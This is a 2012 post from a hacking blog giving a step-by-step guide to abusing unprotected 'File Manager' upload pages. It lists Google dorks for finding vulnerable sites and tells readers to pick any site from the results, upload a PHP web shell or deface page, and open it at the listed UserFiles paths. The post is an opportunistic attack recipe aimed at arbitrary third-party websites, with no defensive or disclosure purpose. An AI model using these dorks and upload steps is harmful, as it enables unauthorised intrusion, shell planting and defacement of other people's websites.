*Wild Wings Hackers*

|Hacks|Crack|Tips |Tricks|Cracks |Programs|Tutorials |Movies|Games|

Breaking

Sunday, May 27, 2012

Home / Website hacking / "File Manager" ~ remote shell and deface upload vulnerability

"File Manager" ~ remote shell and deface upload vulnerability

by on in
"File Manager" ~ remote shell and deface upload vulnerability

Dorks : 
inurl:/filemanager/userfiles/ filetype:pdf
inurl:/filemanager/index.html
Exploit : 
http://www.site.com/filemanager/index.html
Lets Start !
open google or bing and type dork inurl:/filemanager/userfiles/ filetype:pdf or 
inurl:/filemanager/index.html 
now select any website from search results 
after clicking on website url will be 
http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
Now Delete keywords after filemanager
for example
Before : http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
After http://www.site.com/filemanager/
Now find upload option there and upload your shell or deface Page there
you file will upload in userfiles directory 
To View your upload shell or file goto 
http://www.site.com/UserFiles/Shell.php
http://www.site.com/UserFiles/deface.html
or 
http://www.site.com/UserFiles/directory/Shell.php
http://www.site.com/UserFiles/directory/deface.html

Donate a Facebook status !
Author Image

About Anonymous
Soratemplates is a blogger resources site is a provider of high quality blogger template with premium looking layout and robust design. The main mission of templatesyard is to provide the best quality blogger templates.

Related Posts:
By -
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)